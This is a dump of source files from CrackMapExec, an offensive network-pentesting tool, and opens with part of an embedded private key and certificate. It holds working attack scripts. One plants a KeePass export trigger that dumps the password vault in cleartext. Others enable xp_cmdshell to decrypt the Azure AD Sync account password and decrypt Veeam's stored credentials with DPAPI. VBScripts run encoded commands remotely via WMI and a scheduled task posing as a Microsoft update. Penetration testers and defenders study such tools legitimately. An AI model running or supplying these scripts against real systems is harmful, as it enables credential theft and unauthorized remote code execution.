cc5ZRtDi79MXPePDinhRivVi/48LsYoFXRtodjcAMWqAyH7n17Kxkvl1rRsaNAq/
H4F0kXuTXReV3LtZmZTLXmju2spGz3e3yKqgB+7dWUauqK44WaO1rYz32hTxLxil
kN8k77KmfNkqz+9WY6S4CqIh
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIC+zCCAeOgAwIBAgIUPjiFj6PH8T2dFrcwoqL7bHkXKfQwDQYJKoZIhvcNAQEL
BQAwDTELMAkGA1UEBhMCVVMwHhcNMjAwNTEwMTAyMzA5WhcNMjEwNTEwMTAyMzA5
WjANMQswCQYDVQQGEwJVUzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMtHEINVVeaNwVau+7AhmHrLAs219+xMVDZADKRROXoIbOf6umjP+z8Bfuzb91aS
/6lxRQs014fYB71g2Ezu9CoPMoDhGPUXNU70shCi3cXfZ71JBaTbMnR2Jre5rGut
lNB4s6khJr2DdDSee9+VfYqNqtn85SvFIkDcdGDHQLQ3tubIL+NdJ4zxwtDEmMh0
2nF4x9IDmSh4QQmHNpZkuC0mlfk07Gl4kFF+E9I4veva3apQafNy28ds9mZ3JHAh
EICIk1Idl34KKsJrKmXN1rENnSuUxylp6h05Om6wEuYBYQ/q5AQqtEGAv4BU6jsO
mdwhuYxA+RIDctpKXKH52BECAwEAAaNTMFEwHQYDVR0OBBYEFO+GlEFEBLb5Rv8x
bx/bsBBNgwSxMB8GA1UdIwQYMBaAFO+GlEFEBLb5Rv8xbx/bsBBNgwSxMA8GA1Ud
EwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAHU17UUlL2rl+xLdBDRqcVBb
DUWwvmkBL22G05LcIIjlA7YeeKHBA0D6ppulTZ+HWZ2mo2n10bIso+SryytGrU0g
p9Rt+mUDiWOQJWi0W6VAhK72wsJG5DnRdf5yXjbsY065iA4Q5UfhQd7TsR3q4EkD
5ziOrKiuB5T3PR48aE/Cpg0aTGpx05OEVG6un1xwUpT6d6j5qP2IELaCG446ZZIO
0BrvUoOTwYCV6UhhV1F3xirVFpUwTtp8Ms/fst4vSX9/6PgyBd09icB+O8t9LhXG
b6FMHKpKOOkRQztqJR3ipMlW6Ceslwqs5CBRowbySi3C4kpEplM6hbVTelzwP6U=
-----END CERTIFICATE-----
================================================
FILE: cme/data/keepass_trigger_module/AddKeePassTrigger.ps1
================================================
$ExportPath = "REPLACE_ME_ExportPath"
$ExportName = "REPLACE_ME_ExportName"
$TriggerName = "REPLACE_ME_TriggerName"
$KeePassXMLPath = "REPLACE_ME_KeePassXMLPath"
$TriggerXML = [xml] @"
$([Convert]::ToBase64String([System.GUID]::NewGuid().ToByteArray()))
$TriggerName
true
bES7XfGLTA2IzmXm6a0pig==
1
False
D5prW87VRr65NO2xP5RIIg==
$ExportPath\$ExportName
KeePass XML (2.x)
"@
if($KeePassXMLPath -and ($KeePassXMLPath -match '.\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {
$KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath
$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
if ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -is [String]) {
$Triggers = $KeePassXML.CreateElement('Triggers')
$Null = $Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))
$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))
}
else {
$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))
}
$KeePassXML.Save($KeePassXMLPath)
}
================================================
FILE: cme/data/keepass_trigger_module/RemoveKeePassTrigger.ps1
================================================
$KeePassXMLPath = "REPLACE_ME_KeePassXMLPath"
$TriggerName = "REPLACE_ME_TriggerName"
if($KeePassXMLPath -and ($KeePassXMLPath -match '.\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {
$KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath
$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
$RandomGUID = [System.GUID]::NewGuid().ToByteArray()
if ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -isnot [String]) {
$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}
ForEach($Child in $Children) {
$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)
}
}
try {
$KeePassXML.Save($KeePassXMLPath)
}
catch {
}
}
================================================
FILE: cme/data/keepass_trigger_module/RestartKeePass.ps1
================================================
$KeePassUser = "REPLACE_ME_KeePassUser"
$KeePassBinaryPath = "REPLACE_ME_KeePassBinaryPath"
$DummyServiceName = "REPLACE_ME_DummyServiceName"
schtasks /create /tn "$DummyServiceName" /tr "$KeePassBinaryPath" /ru $KeePassUser /it /sc ONLOGON
taskkill /F /T /IM keepass.exe /FI "USERNAME eq $KeePassUser"
schtasks /run /tn "$DummyServiceName"
Start-Sleep -s 3
schtasks /delete /tn "$DummyServiceName" /F
================================================
FILE: cme/data/msol_dump/msol_dump.ps1
================================================
$sqlbin=@(Get-ChildItem -Path C:\"Program Files"\"Microsoft SQL Server"\ -Filter sqllocaldb.exe -Recurse).fullname
$db=@(cmd /c $sqlbin info | findstr /i ADSy)
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\$db;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
}
Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_server_configuration"
return
}
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_management_agent"
return
}
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
$cmd = $client.CreateCommand()
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
$reader = $cmd.ExecuteReader()
$decrypted = [string]::Empty
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
$decrypted += $reader.GetString(0)
}
if ($decrypted -eq [string]::Empty) {
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
return
}
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host "Domain: $($domain.Domain)"
Write-Host "Username: $($username.Username)"
Write-Host "Password: $($password.Password)"
================================================
FILE: cme/data/veeam_dump_module/veeam_dump_mssql.ps1
================================================
$SqlDatabaseName = "REPLACE_ME_SqlDatabase"
$SqlServerName = "REPLACE_ME_SqlServer"
$SqlInstanceName = "REPLACE_ME_SqlInstance"
#Forming the connection string
$SQL = "SELECT [user_name] AS 'User',[password] AS 'Password' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
$auth = "Integrated Security=SSPI;" #Local user
$connectionString = "Provider=sqloledb; Data Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;"
$connection = New-Object System.Data.OleDb.OleDbConnection $connectionString
$command = New-Object System.Data.OleDb.OleDbCommand $SQL, $connection
#Fetching encrypted credentials from the database
try {
$connection.Open()
$adapter = New-Object System.Data.OleDb.OleDbDataAdapter $command
$dataset = New-Object System.Data.DataSet
[void] $adapter.Fill($dataSet)
$connection.Close()
}
catch {
Write-Host "Can't connect to DB! Exiting..."
exit -1
}
$rows=($dataset.Tables | Select-Object -Expand Rows)
if ($rows.count -eq 0) {
Write-Host "No passwords found!"
exit
}
Add-Type -assembly System.Security
#Decrypting passwords using DPAPI
$rows | ForEach-Object -Process {
$EnryptedPWD = [Convert]::FromBase64String($_.password)
$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
$enc = [system.text.encoding]::Default
$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
}
Write-Output $rows | Format-Table -HideTableHeaders | Out-String
================================================
FILE: cme/data/veeam_dump_module/veeam_dump_postgresql.ps1
================================================
$PostgreSqlExec = "REPLACE_ME_PostgreSqlExec"
$PostgresUserForWindowsAuth = "REPLACE_ME_PostgresUserForWindowsAuth"
$SqlDatabaseName = "REPLACE_ME_SqlDatabaseName"
$SQLStatement = "SELECT user_name AS User,password AS Password FROM credentials WHERE password != '';"
$output = . $PostgreSqlExec -U $PostgresUserForWindowsAuth -w -d $SqlDatabaseName -c $SQLStatement --csv | ConvertFrom-Csv
if ($output.count -eq 0) {
Write-Host "No passwords found!"
exit
}
Add-Type -assembly System.Security
#Decrypting passwords using DPAPI
$output | ForEach-Object -Process {
$EnryptedPWD = [Convert]::FromBase64String($_.password)
$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
$enc = [system.text.encoding]::Default
$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
}
Write-Output $output | Format-Table -HideTableHeaders | Out-String
================================================
FILE: cme/data/wmiexec_event_vbscripts/Exec_Command_Silent.vbs
================================================
Dim command
command = Base64StringDecode("REPLACE_ME_BASE64_COMMAND")
Const TriggerTypeDaily = 1
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Update"
regInfo.Author = "Microsoft"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
settings.DisallowStartIfOnBatteries = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(7)
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "c:\windows\system32\cmd.exe"
Action.arguments = "/Q /c " & command
Dim objNet, LoginUser
Set objNet = CreateObject("WScript.Network")
LoginUser = objNet.UserName
If UCase(LoginUser) = "SYSTEM" Then
Else
LoginUser = Empty
End If
Call rootFolder.RegisterTaskDefinition("REPLACE_ME_TEMP_TASKNAME", taskDefinition, 6, LoginUser, , 3)
Call rootFolder.DeleteTask("REPLACE_ME_TEMP_TASKNAME",0)
Function Base64StringDecode(ByVal vCode)
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.Position = 0
BinaryStream.Type = 2
' All Format => utf-16le - utf-8 - utf-16le
BinaryStream.CharSet = "utf-8"
Base64StringDecode = BinaryStream.ReadText
Set BinaryStream = Nothing
Set oNode = Nothing
End Function
================================================
FILE: cme/data/wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs
================================================
Dim command, outputPath
command = Base64StringDecode("REPLACE_ME_BASE64_COMMAND")
outputPath = "C:\Windows\Temp\REPLACE_ME_OUTPUT_FILE"
On Error Resume Next
Set objTestNewInst = GetObject("Winmgmts:root\subscription:ActiveScriptEventConsumer.Name=""REPLACE_ME_INSTANCEID""")
If Err.Number <> 0 Then
Err.Clear
If FileExists(outputPath) Then
inputFile = outputPath
Set inStream = CreateObject("ADODB.Stream")
inStream.Open
inStream.type= 1 'TypeBinary
inStream.LoadFromFile(inputFile)
readBytes = inStream.Read()
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue = readBytes
Base64Encode = oNode.text
' Write back into wmi class
wbemCimtypeString = 8
Set objClass = GetObject("Winmgmts:root\subscription:ActiveScriptEventConsumer")
Set objInstance = objClass.spawninstance_
objInstance.name="REPLACE_ME_INSTANCEID"
objInstance.scriptingengine="vbscript"
objInstance.scripttext = Base64Encode
objInstance.put_
Else
Const TriggerTypeDaily = 1
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Update"
regInfo.Author = "Microsoft"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
settings.DisallowStartIfOnBatteries = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(7)
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "c:\windows\system32\cmd.exe"
Action.arguments = "/Q /c " & command & " 1> " & outputPath & " 2>&1"
Dim objNet, LoginUser
Set objNet = CreateObject("WScript.Network")
LoginUser = objNet.UserName
If UCase(LoginUser) = "SYSTEM" Then
Else
LoginUser = Empty
End If
Call rootFolder.RegisterTaskDefinition("REPLACE_ME_TEMP_TASKNAME", taskDefinition, 6, LoginUser, , 3)
Call rootFolder.DeleteTask("REPLACE_ME_TEMP_TASKNAME",0)
End If
Else
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(outputPath)
If Err.Number <> 0 Then
Err.Clear
End If
End If
Function FileExists(FilePath)
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists(FilePath) Then
FileExists=CBool(1)
Else
FileExists=CBool(0)
End If
End Function
Function Base64StringDecode(ByVal vCode)
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.Position = 0
BinaryStream.Type = 2
' All Format => utf-16le - utf-8 - utf-16le
BinaryStream.CharSet = "utf-8"
Base64StringDecode = BinaryStream.ReadText
Set BinaryStream = Nothing
Set oNode = Nothing
End Function
================================================
FILE: cme/first_run.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from os import mkdir
from os.path import exists
from os.path import join as path_join
import shutil
from cme.paths import CME_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
from cme.cmedb import initialize_db
from cme.logger import cme_logger
def first_run_setup(logger=cme_logger):
if not exists(TMP_PATH):
mkdir(TMP_PATH)
if not exists(CME_PATH):
logger.display("First time use detected")
logger.display("Creating home directory structure")
mkdir(CME_PATH)
folders = (
"logs",
"modules",
"protocols",
"workspaces",
"obfuscated_scripts",
"screenshots",
)
for folder in folders:
if not exists(path_join(CME_PATH, folder)):
logger.display(f"Creating missing folder {folder}")
mkdir(path_join(CME_PATH, folder))
initialize_db(logger)
if not exists(CONFIG_PATH):
logger.display("Copying default configuration file")
default_path = path_join(DATA_PATH, "cme.conf")
shutil.copy(default_path, CME_PATH)
# if not exists(CERT_PATH):
# logger.display('Generating SSL certificate')
# try:
# check_output(['openssl', 'help'], stderr=PIPE)
# if os.name != 'nt':
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US" > /dev/null 2>&1'.format(path=CERT_PATH))
# else:
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US"'.format(path=CERT_PATH))
# except OSError as e:
# if e.errno == errno.ENOENT:
# logger.error('OpenSSL command line utility is not installed, could not generate certificate, using default certificate')
# default_path = path_join(DATA_PATH, 'default.pem')
# shutil.copy(default_path, CERT_PATH)
# else:
# logger.error('Error while generating SSL certificate: {}'.format(e))
# sys.exit(1)
================================================
FILE: cme/helpers/__init__.py
================================================
================================================
FILE: cme/helpers/bash.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from cme.paths import DATA_PATH
def get_script(path):
with open(os.path.join(DATA_PATH, path), "r") as script:
return script.read()
================================================
FILE: cme/helpers/bloodhound.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def add_user_bh(user, domain, logger, config):
users_owned = []
if isinstance(user, str):
users_owned.append({"username": user.upper(), "domain": domain.upper()})
else:
users_owned = user
if config.get("BloodHound", "bh_enabled") != "False":
try:
from neo4j.v1 import GraphDatabase
except:
from neo4j import GraphDatabase
from neo4j.exceptions import AuthError, ServiceUnavailable
uri = f"bolt://{config.get('BloodHound', 'bh_uri')}:{config.get('BloodHound', 'bh_port')}"
driver = GraphDatabase.driver(
uri,
auth=(
config.get("BloodHound", "bh_user"),
config.get("BloodHound", "bh_pass"),
),
encrypted=False,
)
try:
with driver.session() as session:
with session.begin_transaction() as tx:
for info in users_owned:
if info["username"][-1] == "$":
user_owned = info["username"][:-1] + "." + info["domain"]
account_type = "Computer"
else:
user_owned = info["username"] + "@" + info["domain"]
account_type = "User"
result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c')
if result.data()[0]["c"].get("owned") in (False, None):
logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound")
except AuthError as e:
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
return
except ServiceUnavailable as e:
logger.fail(f"Neo4J does not seem to be available on {uri}.")
return
except Exception as e:
logger.fail("Unexpected error with Neo4J")
logger.fail("Account not found on the domain")
return
driver.close()
================================================
FILE: cme/helpers/http.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
def get_desktop_uagent(uagent=None):
desktop_uagents = {
"MSIE9.0": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"MSIE8.0": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)",
"MSIE7.0": "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"MSIE6.0": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Chrome32": "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
"Chrome31": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36",
"Firefox25": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0",
"Firefox24": "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0,",
"Safari5.1": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Safari5.0": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16",
}
if not uagent:
return desktop_uagents[random.choice(desktop_uagents.keys())]
elif uagent:
return desktop_uagents[uagent]
================================================
FILE: cme/helpers/logger.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from termcolor import colored
def write_log(data, log_name):
logs_dir = os.path.join(os.path.expanduser("~/.cme"), "logs")
with open(os.path.join(logs_dir, log_name), "w") as log_output:
log_output.write(data)
def highlight(text, color="yellow"):
if color == "yellow":
return f"{colored(text, 'yellow', attrs=['bold'])}"
elif color == "red":
return f"{colored(text, 'red', attrs=['bold'])}"
================================================
FILE: cme/helpers/misc.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
import string
import re
import inspect
import os
def identify_target_file(target_file):
with open(target_file, "r") as target_file_handle:
for i, line in enumerate(target_file_handle):
if i == 1:
if line.startswith("\n"):
return "nmap"
return "unknown"
def gen_random_string(length=10):
return "".join(random.sample(string.ascii_letters, int(length)))
def validate_ntlm(data):
allowed = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
if allowed.match(data):
return True
else:
return False
def called_from_cmd_args():
for stack in inspect.stack():
if stack[3] == "print_host_info":
return True
if stack[3] == "plaintext_login" or stack[3] == "hash_login" or stack[3] == "kerberos_login":
return True
if stack[3] == "call_cmd_args":
return True
return False
# Stolen from https://github.com/pydanny/whichcraft/
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
Note: This function was backported from the Python 3 source code.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)
# If we're given a path with a directory part, look it up directly
# rather than referring to PATH directories. This includes checking
# relative to the current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
================================================
FILE: cme/helpers/msada_guids.py
================================================
"""
Impacket - Collection of Python classes for working with network protocols.
SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
This software is provided under a slightly modified version
of the Apache Software License. See the accompanying LICENSE file
for more information.
Authors:
Charlie BROMBERG (@_nwodtuhs)
Guillaume DAUMAS (@BlWasp_)
Lucien DOUSTALY (@Wlayzz)
References:
MS-ADA1, MS-ADA2, MS-ADA3 Active Directory Schema Attributes and their GUID:
- [MS-ADA1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/19528560-f41e-4623-a406-dabcfff0660f
- [MS-ADA2] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/e20ebc4e-5285-40ba-b3bd-ffcb81c2783e
- [MS-ADA3] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/4517e835-3ee6-44d4-bb95-a94b6966bfb0
GUIDS gathered from (lots of cleaning made from that source, things may be missing):
- https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1
This library is, for the moment, not present in the Impacket version used by CrackMapExec, so I add it manually in helpers.
"""
SCHEMA_OBJECTS = {
"2a132580-9373-11d1-aebc-0000f80367c1": "FRS-Partner-Auth-Level",
"2a8c68fc-3a7a-4e87-8720-fe77c51cbe74": "ms-DS-Non-Members-BL",
"963d2751-48be-11d1-a9c3-0000f80367c1": "Mscope-Id",
"bf967a0c-0de6-11d0-a285-00aa003049e2": "Range-Lower",
"29259694-09e4-4237-9f72-9306ebe63ab2": "ms-TS-Primary-Desktop",
"963d2756-48be-11d1-a9c3-0000f80367c1": "DHCP-Class",
"1562a632-44b9-4a7e-a2d3-e426c96a3acc": "ms-PKI-Private-Key-Recovery-Agent",
"2a132581-9373-11d1-aebc-0000f80367c1": "FRS-Primary-Member",
"4b1cba4e-302f-4134-ac7c-f01f6c797843": "ms-DS-Phonetic-First-Name",
"7bfdcb7d-4807-11d1-a9c3-0000f80367c1": "Msi-File-List",
"bf967a0d-0de6-11d0-a285-00aa003049e2": "Range-Upper",
"f63aa29a-bb31-48e1-bfab-0a6c5a1d39c2": "ms-TS-Secondary-Desktops",
"5245801a-ca6a-11d0-afff-0000f80367c1": "FRS-Replica-Set-GUID",
"f217e4ec-0836-4b90-88af-2f5d4bbda2bc": "ms-DS-Phonetic-Last-Name",
"d9e18313-8939-11d1-aebc-0000f80367c1": "Msi-Script",
"bf967a0e-0de6-11d0-a285-00aa003049e2": "RDN",
"9daadc18-40d1-4ed1-a2bf-6b9bf47d3daa": "ms-TS-Primary-Desktop-BL",
"e0fa1e8a-9b45-11d0-afdd-00c04fd930c9": "Display-Specifier",
"bf967aa8-0de6-11d0-a285-00aa003049e2": "Print-Queue",
"bf967a8f-0de6-11d0-a285-00aa003049e2": "DMD",
"26d9736b-6070-11d1-a9c6-0000f80367c1": "FRS-Replica-Set-Type",
"6cd53daf-003e-49e7-a702-6fa896e7a6ef": "ms-DS-Phonetic-Department",
"96a7dd62-9118-11d1-aebc-0000f80367c1": "Msi-Script-Name",
"bf967a0f-0de6-11d0-a285-00aa003049e2": "RDN-Att-ID",
"34b107af-a00a-455a-b139-dd1a1b12d8af": "ms-TS-Secondary-Desktop-BL",
"1be8f174-a9ff-11d0-afe2-00c04fd930c9": "FRS-Root-Path",
"5bd5208d-e5f4-46ae-a514-543bc9c47659": "ms-DS-Phonetic-Company-Name",
"bf967937-0de6-11d0-a285-00aa003049e2": "Msi-Script-Path",
"bf967a10-0de6-11d0-a285-00aa003049e2": "Registered-Address",
"faaea977-9655-49d7-853d-f27bb7aaca0f": "MS-TS-Property01",
"5fd4250c-1262-11d0-a060-00aa006c33ed": "Display-Template",
"83cc7075-cca7-11d0-afff-0000f80367c1": "Query-Policy",
"5a8b3261-c38d-11d1-bbc9-0080c76670c0": "SubSchema",
"5245801f-ca6a-11d0-afff-0000f80367c1": "FRS-Root-Security",
"e21a94e4-2d66-4ce5-b30d-0ef87a776ff0": "ms-DS-Phonetic-Display-Name",
"96a7dd63-9118-11d1-aebc-0000f80367c1": "Msi-Script-Size",
"bf967a12-0de6-11d0-a285-00aa003049e2": "Remote-Server-Name",
"3586f6ac-51b7-4978-ab42-f936463198e7": "MS-TS-Property02",
"bf967915-0de6-11d0-a285-00aa003049e2": "Account-Expires",
"ddac0cee-af8f-11d0-afeb-00c04fd930c9": "FRS-Service-Command",
"def449f1-fd3b-4045-98cf-d9658da788b5": "ms-DS-HAB-Seniority-Index",
"9a0dc326-c100-11d1-bbc5-0080c76670c0": "MSMQ-Authenticate",
"bf967a14-0de6-11d0-a285-00aa003049e2": "Remote-Source",
"70004ef5-25c3-446a-97c8-996ae8566776": "MS-TS-ExpireDate",
"bf967aa9-0de6-11d0-a285-00aa003049e2": "Remote-Mail-Recipient",
"bf967a80-0de6-11d0-a285-00aa003049e2": "Attribute-Schema",
"2a132582-9373-11d1-aebc-0000f80367c1": "FRS-Service-Command-Status",
"c881b4e2-43c0-4ebe-b9bb-5250aa9b434c": "ms-DS-Promotion-Settings",
"9a0dc323-c100-11d1-bbc5-0080c76670c0": "MSMQ-Base-Priority",
"bf967a15-0de6-11d0-a285-00aa003049e2": "Remote-Source-Type",
"54dfcf71-bc3f-4f0b-9d5a-4b2476bb8925": "MS-TS-ExpireDate2",
"e0fa1e8b-9b45-11d0-afdd-00c04fd930c9": "Dns-Zone",
"031952ec-3b72-11d2-90cc-00c04fd91ab1": "Account-Name-History",
"1be8f175-a9ff-11d0-afe2-00c04fd930c9": "FRS-Staging-Path",
"98a7f36d-3595-448a-9e6f-6b8965baed9c": "ms-DS-SiteName",
"9a0dc32e-c100-11d1-bbc5-0080c76670c0": "MSMQ-Computer-Type",
"2a39c5b0-8960-11d1-aebc-0000f80367c1": "Remote-Storage-GUID",
"41bc7f04-be72-4930-bd10-1f3439412387": "MS-TS-ExpireDate3",
"2a39c5bd-8960-11d1-aebc-0000f80367c1": "Remote-Storage-Service-Point",
"7f56127d-5301-11d1-a9c5-0000f80367c1": "ACS-Aggregate-Token-Rate-Per-User",
"2a132583-9373-11d1-aebc-0000f80367c1": "FRS-Time-Last-Command",
"20119867-1d04-4ab7-9371-cfc3d5df0afd": "ms-DS-Supported-Encryption-Types",
"18120de8-f4c4-4341-bd95-32eb5bcf7c80": "MSMQ-Computer-Type-Ex",
"281416c0-1968-11d0-a28f-00aa003049e2": "Repl-Property-Meta-Data",
"5e11dc43-204a-4faf-a008-6863621c6f5f": "MS-TS-ExpireDate4",
"39bad96d-c2d6-4baf-88ab-7e4207600117": "document",
"7f561283-5301-11d1-a9c5-0000f80367c1": "ACS-Allocable-RSVP-Bandwidth",
